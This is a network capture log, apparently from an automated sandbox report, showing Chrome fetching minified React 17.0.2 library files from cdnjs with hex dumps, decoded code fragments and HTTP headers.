                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 3b 77 3d 64 28 22 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 22 29 3b 68 61 3d 64 28 22 72 65 61 63 74 2e 70 6f 72 74 61 6c 22 29 3b 63 2e 46 72 61 67 6d 65 6e 74 3d 64 28 22 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 22 29 3b 63 2e 53 74 72 69 63 74 4d 6f 64 65 3d 64 28 22 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 22 29 3b 63 2e 50 72 6f 66 69 6c 65 72 3d 64 28 22 72 65 61 63 74 2e 70 72 6f 66 69 6c 65 72 22 29 3b 6b 61 3d 64 28 22 72 65 61 63 74 2e 70 72 6f 76 69 64 65 72 22 29 3b 6c 61 3d 64 28 22 72 65 61 63 74 2e 63 6f 6e 74 65 78 74 22 29 3b 6d 61 3d 64 28 22 72 65 61 63 74 2e 66 6f 72 77 61 72 64 5f 72 65 66 22 29 3b 63 2e 53 75 73 70 65 6e 73 65 3d 64 28 22 72 65 61 63 74 2e 73 75 73 70 65 6e 73 65 22 29 3b 6e 61 3d 64 28 22 72 65 61 63 74 2e
                                                                                                          Data Ascii: ;w=d("react.element");ha=d("react.portal");c.Fragment=d("react.fragment");c.StrictMode=d("react.strict_mode");c.Profiler=d("react.profiler");ka=d("react.provider");la=d("react.context");ma=d("react.forward_ref");c.Suspense=d("react.suspense");na=d("react.
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 65 2e 6e 6f 77 29 7b 76 61 72 20 7a 61 3d 70 65 72 66 6f 72 6d 61 6e 63 65 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 7a 61 2e 6e 6f 77 28 29 7d 7d 65 6c 73 65 7b 76 61 72 20 70 61 3d 44 61 74 65 2c 41 61 3d 70 61 2e 6e 6f 77 28 29 3b 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 61 2e 6e 6f 77 28 29 2d 41 61 7d 7d 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 3d 74 79 70 65 6f 66 20 4d 65 73 73 61 67 65 43 68 61 6e 6e 65 6c 29 7b 76 61 72 20 42 3d 6e 75 6c 6c 2c 71 61 3d 6e 75 6c 6c 2c 72 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 42 29 74 72 79 7b 76 61 72 20 61 3d 74 28 29 3b 42 28 21 30 2c 61
                                                                                                          Data Ascii: e.now){var za=performance;var t=function(){return za.now()}}else{var pa=Date,Aa=pa.now();t=function(){return pa.now()-Aa}}if("undefined"===typeof window||"function"!==typeof MessageChannel){var B=null,qa=null,ra=function(){if(null!==B)try{var a=t();B(!0,a
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 2c 61 29 3f 58 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 6e 75 6c 6c 29 3a 28 49 3d 21 31 2c 4a 3d 6e 75 6c 6c 29 7d 63 61 74 63 68 28 62 29 7b 74 68 72 6f 77 20 58 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 6e 75 6c 6c 29 2c 62 3b 7d 7d 65 6c 73 65 20 49 3d 21 31 7d 3b 41 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4a 3d 61 3b 49 7c 7c 28 49 3d 21 30 2c 58 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 6e 75 6c 6c 29 29 7d 3b 47 3d 0a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 57 3d 42 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 74 28 29 29 7d 2c 62 29 7d 3b 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 61 28 57 29 3b 57 3d 2d 31 7d 7d 76 61 72 20 71 3d 5b 5d 2c 72 3d 5b 5d 2c 44 61 3d 31 2c 6d 3d 6e 75 6c 6c 2c 67 3d 33 2c 48 3d 21 31 2c 75 3d 21 31 2c 7a 3d 21 31 2c 45 61 3d
                                                                                                          Data Ascii: ,a)?X.postMessage(null):(I=!1,J=null)}catch(b){throw X.postMessage(null),b;}}else I=!1};A=function(a){J=a;I||(I=!0,X.postMessage(null))};G=function(a,b){W=Ba(function(){a(t())},b)};S=function(){Ca(W);W=-1}}var q=[],r=[],Da=1,m=null,g=3,H=!1,u=!1,z=!1,Ea=
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 67 3b 67 3d 62 3b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 69 6e 61 6c 6c 79 7b 67 3d 63 7d 7d 7d 2c 75 6e 73 74 61 62 6c 65 5f 67 65 74 43 75 72 72 65 6e 74 50 72 69 6f 72 69 74 79 4c 65 76 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 2c 67 65 74 20 75 6e 73 74 61 62 6c 65 5f 73 68 6f 75 6c 64 59 69 65 6c 64 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 75 6e 73 74 61 62 6c 65 5f 72 65 71 75 65 73 74 50 61 69 6e 74 3a 64 2c 75 6e 73 74 61 62 6c 65 5f 63 6f 6e 74 69 6e 75 65 45 78 65 63 75 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 75 7c 7c 48 7c 7c 28 75 3d 21 30 2c 41 28 52 29 29 7d 2c 75 6e 73 74 61 62 6c 65 5f
                                                                                                          Data Ascii: function(){var c=g;g=b;try{return a.apply(this,arguments)}finally{g=c}}},unstable_getCurrentPriorityLevel:function(){return g},get unstable_shouldYield(){return T},unstable_requestPaint:d,unstable_continueExecution:function(){u||H||(u=!0,A(R))},unstable_
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 20 6b 3d 0a 61 2e 74 79 70 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3b 66 6f 72 28 68 20 69 6e 20 62 29 65 61 2e 63 61 6c 6c 28 62 2c 68 29 26 26 21 66 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 68 29 26 26 28 64 5b 68 5d 3d 76 6f 69 64 20 30 3d 3d 3d 62 5b 68 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6b 3f 6b 5b 68 5d 3a 62 5b 68 5d 29 7d 76 61 72 20 68 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 32 3b 69 66 28 31 3d 3d 3d 68 29 64 2e 63 68 69 6c 64 72 65 6e 3d 63 3b 65 6c 73 65 20 69 66 28 31 3c 68 29 7b 6b 3d 41 72 72 61 79 28 68 29 3b 66 6f 72 28 76 61 72 20 6d 3d 30 3b 6d 3c 68 3b 6d 2b 2b 29 6b 5b 6d 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6d 2b 32 5d 3b 64 2e 63 68 69 6c 64 72 65 6e 3d 6b 7d 72 65 74 75 72 6e 7b 24 24 74 79 70 65 6f 66 3a
                                                                                                          Data Ascii: k=a.type.defaultProps;for(h in b)ea.call(b,h)&&!fa.hasOwnProperty(h)&&(d[h]=void 0===b[h]&&void 0!==k?k[h]:b[h])}var h=arguments.length-2;if(1===h)d.children=c;else if(1<h){k=Array(h);for(var m=0;m<h;m++)k[m]=arguments[m+2];d.children=k}return{$$typeof:
                                                                                                          2024-12-24 19:56:21 UTC87INData Raw: 73 65 52 65 66 28 61 29 7d 3b 63 2e 75 73 65 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 29 2e 75 73 65 53 74 61 74 65 28 61 29 7d 3b 63 2e 76 65 72 73 69 6f 6e 3d 22 31 37 2e 30 2e 32 22 7d 29 3b 0a 7d 29 28 29 3b 0a 0d 0a
                                                                                                          Data Ascii: seRef(a)};c.useState=function(a){return n().useState(a)};c.version="17.0.2"});})();


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449746104.17.24.144435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:20 UTC571OUTGET /ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js HTTP/1.1
                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:21 UTC957INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 24 Dec 2024 19:56:21 GMT
                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                          ETag: W/"605933ce-1d709"
                                                                                                          Last-Modified: Tue, 23 Mar 2021 00:18:22 GMT
                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Timing-Allow-Origin: *
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 424971
                                                                                                          Expires: Sun, 14 Dec 2025 19:56:21 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GW5nwsL6aCCbyRlyMAmE7IqF2T6QnOXQbl1IINaXffkXfYTAkacgsgfCvZL0m%2BnETkmEw%2BCrrYEJ6qB7Q7OfS1whYlJHIW3XGf0MDRd7MsOBb2OJKk5v805FFSUGnmQWKj9d8GHK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f7327790f1b5e7f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-24 19:56:21 UTC412INData Raw: 33 39 37 35 0d 0a 2f 2a 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 20 76 31 37 2e 30 2e 32 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75
                                                                                                          Data Ascii: 3975/** @license React v17.0.2 * react-dom.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(fu
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 72 65 61 63 74 22 5d 2c 68 61 29 3a 28 4d 3d 4d 7c 7c 73 65 6c 66 2c 68 61 28 4d 2e 52 65 61 63 74 44 4f 4d 3d 7b 7d 2c 4d 2e 52 65 61 63 74 29 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 68 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 61 2c 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 2b 3d
                                                                                                          Data Ascii: e("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+=
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 6e 20 45 64 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 49 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 62 29 3f 49 5b 62 5d 3a 6e 75 6c 6c 3b 76 61 72 20 66 3d 6e 75 6c 6c 21 3d 3d 65 3f 30 3d 3d 3d 65 2e 74 79 70 65 3a 64 3f 21 31 3a 21 28 32 3c 62 2e 6c 65 6e 67 74 68 29 7c 7c 0a 22 6f 22 21 3d 3d 62 5b 30 5d 26 26 22 4f 22 21 3d 3d 62 5b 30 5d 7c 7c 22 6e 22 21 3d 3d 62 5b 31 5d 26 26 22 4e 22 21 3d 3d 62 5b 31 5d 3f 21 31 3a 21 30 3b 66 7c 7c 28 6f 69 28 62 2c 63 2c 65 2c 64 29 26 26 28 63 3d 6e 75 6c 6c 29 2c 64 7c 7c 6e 75 6c 6c 3d 3d 3d 65 3f 6c 69 28 62 29 26 26 28 6e 75 6c 6c 3d 3d 3d 63 3f 61 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 62 29 3a 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 62 2c 22 22 2b 63 29 29 3a 65 2e 6d 75 73
                                                                                                          Data Ascii: n Ed(a,b,c,d){var e=I.hasOwnProperty(b)?I[b]:null;var f=null!==e?0===e.type:d?!1:!(2<b.length)||"o"!==b[0]&&"O"!==b[0]||"n"!==b[1]&&"N"!==b[1]?!1:!0;f||(oi(b,c,e,d)&&(c=null),d||null===e?li(b)&&(null===c?a.removeAttribute(b):a.setAttribute(b,""+c)):e.mus
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 3d 68 29 7b 64 6f 20 69 66 28 67 2d 2d 2c 68 2d 2d 2c 30 3e 68 7c 7c 65 5b 67 5d 21 3d 3d 66 5b 68 5d 29 72 65 74 75 72 6e 22 5c 6e 22 2b 65 5b 67 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 77 68 69 6c 65 28 31 3c 3d 67 26 26 30 3c 3d 68 29 7d 62 72 65 61 6b 7d 7d 7d 66 69 6e 61 6c 6c 79 7b 47 64 3d 21 31 2c 45 72 72 6f 72 2e 70 72 65 70 61 72 65 53 74 61 63 6b 54 72 61 63 65 3d 63 7d 72 65 74 75 72 6e 28 61 3d 61 3f 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 61 2e 6e 61 6d 65 3a 22 22 29 3f 4b 62 28 61 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 70 69 28 61 29 7b 73 77 69 74 63 68 28 61 2e 74 61 67 29 7b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 20 4b 62 28 61 2e 74 79 70 65 29 3b 63 61 73 65 20 31 36 3a 72 65 74
                                                                                                          Data Ascii: =h){do if(g--,h--,0>h||e[g]!==f[h])return"\n"+e[g].replace(" at new "," at ");while(1<=g&&0<=h)}break}}}finally{Gd=!1,Error.prepareStackTrace=c}return(a=a?a.displayName||a.name:"")?Kb(a):""}function pi(a){switch(a.tag){case 5:return Kb(a.type);case 16:ret
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 65 3b 72 65 74 75 72 6e 28 61 3d 61 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 22 69 6e 70 75 74 22 3d 3d 3d 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 28 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 62 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 69 28 61 29 7b 76 61 72 20 62 3d 45 66 28 61 29 3f 22 63 68 65 63 6b 65 64 22 3a 22 76 61 6c 75 65 22 2c 63 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 2c 62 29 2c 64 3d 22 22 2b 61 5b 62 5d 3b 69 66 28 21 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 62 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 63 26 26 22 66 75 6e 63 74 69 6f 6e
                                                                                                          Data Ascii: e;return(a=a.nodeName)&&"input"===a.toLowerCase()&&("checkbox"===b||"radio"===b)}function qi(a){var b=Ef(a)?"checked":"value",c=Object.getOwnPropertyDescriptor(a.constructor.prototype,b),d=""+a[b];if(!a.hasOwnProperty(b)&&"undefined"!==typeof c&&"function
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 6c 65 64 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 62 2e 74 79 70 65 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 62 2e 74 79 70 65 3f 6e 75 6c 6c 21 3d 62 2e 63 68 65 63 6b 65 64 3a 6e 75 6c 6c 21 3d 62 2e 76 61 6c 75 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 66 28 61 2c 62 29 7b 62 3d 62 2e 63 68 65 63 6b 65 64 3b 6e 75 6c 6c 21 3d 62 26 26 45 64 28 61 2c 22 63 68 65 63 6b 65 64 22 2c 0a 62 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 64 28 61 2c 62 29 7b 48 66 28 61 2c 62 29 3b 76 61 72 20 63 3d 78 61 28 62 2e 76 61 6c 75 65 29 2c 64 3d 62 2e 74 79 70 65 3b 69 66 28 6e 75 6c 6c 21 3d 63 29 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 3d 64 29 7b 69 66 28 30 3d 3d 3d 63 26 26 22 22 3d 3d 3d 61 2e 76 61 6c 75 65 7c 7c 61 2e 76 61 6c 75 65 21 3d 63 29 61 2e 76 61 6c 75 65
                                                                                                          Data Ascii: led:"checkbox"===b.type||"radio"===b.type?null!=b.checked:null!=b.value}}function Hf(a,b){b=b.checked;null!=b&&Ed(a,"checked",b,!1)}function Nd(a,b){Hf(a,b);var c=xa(b.value),d=b.type;if(null!=c)if("number"===d){if(0===c&&""===a.value||a.value!=c)a.value
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 75 65 29 2c 61 5b 63 5d 2e 73 65 6c 65 63 74 65 64 21 3d 3d 65 26 26 28 61 5b 63 5d 2e 73 65 6c 65 63 74 65 64 3d 65 29 2c 65 26 26 64 26 26 28 61 5b 63 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 7d 65 6c 73 65 7b 63 3d 22 22 2b 78 61 28 63 29 3b 62 3d 6e 75 6c 6c 3b 66 6f 72 28 65 3d 30 3b 65 3c 61 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 69 66 28 61 5b 65 5d 2e 76 61 6c 75 65 3d 3d 3d 63 29 7b 61 5b 65 5d 2e 73 65 6c 65 63 74 65 64 3d 21 30 3b 64 26 26 28 61 5b 65 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 3b 72 65 74 75 72 6e 7d 6e 75 6c 6c 21 3d 3d 62 7c 7c 61 5b 65 5d 2e 64 69 73 61 62 6c 65 64 7c 7c 28 62 3d 61 5b 65 5d 29 7d 6e 75 6c 6c 21 3d 3d 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 3d 21 30 29 7d 7d 66 75
                                                                                                          Data Ascii: ue),a[c].selected!==e&&(a[c].selected=e),e&&d&&(a[c].defaultSelected=!0)}else{c=""+xa(c);b=null;for(e=0;e<a.length;e++){if(a[e].value===c){a[e].selected=!0;d&&(a[e].defaultSelected=!0);return}null!==b||a[e].disabled||(b=a[e])}null!==b&&(b.selected=!0)}}fu
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 7c 7c 30 3d 3d 3d 62 7c 7c 4e 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 29 26 26 4e 62 5b 61 5d 3f 28 22 22 2b 62 29 2e 74 72 69 6d 28 29 3a 62 2b 22 70 78 22 7d 66 75 6e 63 74 69 6f 6e 20 4f 66 28 61 2c 62 29 7b 61 3d 61 2e 73 74 79 6c 65 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 29 7b 76 61 72 20 64 3d 30 3d 3d 3d 63 2e 69 6e 64 65 78 4f 66 28 22 2d 2d 22 29 2c 65 3d 4e 66 28 63 2c 62 5b 63 5d 2c 64 29 3b 22 66 6c 6f 61 74 22 3d 3d 3d 63 26 26 28 63 3d 22 63 73 73 46 6c 6f 61 74 22 29 3b 64 3f 61 2e 73 65 74 50 72 6f 70 65 72 74 79 28 63 2c 65 29 3a 61 5b 63 5d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 64 28 61 2c 62 29 7b 69 66 28 62 29 7b 69 66 28 73 69 5b 61 5d 26 26
                                                                                                          Data Ascii: ||0===b||Nb.hasOwnProperty(a)&&Nb[a]?(""+b).trim():b+"px"}function Of(a,b){a=a.style;for(var c in b)if(b.hasOwnProperty(c)){var d=0===c.indexOf("--"),e=Nf(c,b[c],d);"float"===c&&(c="cssFloat");d?a.setProperty(c,e):a[c]=e}}function Sd(a,b){if(b){if(si[a]&&
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 62 2c 63 29 7d 66 69 6e 61 6c 6c 79 7b 59 64 3d 21 31 2c 57 64 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 62 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 64 3d 48 63 28 63 29 3b 0a 69 66 28 6e 75 6c 6c 3d 3d 3d 64 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 3d 64 5b 62 5d 3b 61 3a 73 77 69 74 63 68 28 62 29 7b 63 61 73 65 20 22 6f 6e 43 6c 69 63 6b 22 3a 63 61 73 65 20 22 6f 6e 43 6c 69 63 6b 43 61 70 74 75 72 65 22 3a 63 61 73 65 20 22 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 22 3a 63 61 73 65 20 22 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 43 61 70 74 75 72 65 22 3a 63 61 73 65 20 22 6f 6e 4d 6f 75 73 65 44 6f 77 6e 22 3a 63 61 73 65 20 22 6f 6e 4d 6f
                                                                                                          Data Ascii: b,c)}finally{Yd=!1,Wd()}}function Pb(a,b){var c=a.stateNode;if(null===c)return null;var d=Hc(c);if(null===d)return null;c=d[b];a:switch(b){case "onClick":case "onClickCapture":case "onDoubleClick":case "onDoubleClickCapture":case "onMouseDown":case "onMo
                                                                                                          2024-12-24 19:56:21 UTC1369INData Raw: 6b 7d 69 66 28 65 2e 63 68 69 6c 64 3d 3d 3d 66 2e 63 68 69 6c 64 29 7b 66 6f 72 28 66 3d 65 2e 63 68 69 6c 64 3b 66 3b 29 7b 69 66 28 66 3d 3d 3d 63 29 72 65 74 75 72 6e 20 55 66 28 65 29 2c 61 3b 69 66 28 66 3d 3d 3d 64 29 72 65 74 75 72 6e 20 55 66 28 65 29 2c 62 3b 66 3d 66 2e 73 69 62 6c 69 6e 67 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 6d 28 31 38 38 29 29 3b 7d 69 66 28 63 2e 72 65 74 75 72 6e 21 3d 3d 64 2e 72 65 74 75 72 6e 29 63 3d 65 2c 64 3d 66 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 67 3d 21 31 2c 68 3d 65 2e 63 68 69 6c 64 3b 68 3b 29 7b 69 66 28 68 3d 3d 3d 63 29 7b 67 3d 21 30 3b 63 3d 65 3b 64 3d 66 3b 62 72 65 61 6b 7d 69 66 28 68 3d 3d 3d 64 29 7b 67 3d 21 30 3b 64 3d 65 3b 63 3d 66 3b 62 72 65 61 6b 7d 68 3d 68 2e 73 69 62 6c 69 6e 67
                                                                                                          Data Ascii: k}if(e.child===f.child){for(f=e.child;f;){if(f===c)return Uf(e),a;if(f===d)return Uf(e),b;f=f.sibling}throw Error(m(188));}if(c.return!==d.return)c=e,d=f;else{for(var g=!1,h=e.child;h;){if(h===c){g=!0;c=e;d=f;break}if(h===d){g=!0;d=e;c=f;break}h=h.sibling


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449748104.17.24.144435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:20 UTC569OUTGET /ajax/libs/react-is/17.0.2/umd/react-is.production.min.js HTTP/1.1
                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:21 UTC961INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 24 Dec 2024 19:56:21 GMT
                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                          ETag: W/"6059349b-935"
                                                                                                          Last-Modified: Tue, 23 Mar 2021 00:21:47 GMT
                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Timing-Allow-Origin: *
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 130918
                                                                                                          Expires: Sun, 14 Dec 2025 19:56:21 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYEUVj%2FEdyx8zR%2BMdrLsMG%2B64j0CHXnp%2FAvSvpybDmn6LMFyXgQOJqfcsh5hwAWVydCx88itDnxf5bPdlKQGUWOIqb%2FYD8ulWyibGDhPhILy1sikC5J0r8zdK6qFlEld9gbMsTk8"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f7327790c0cc35a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
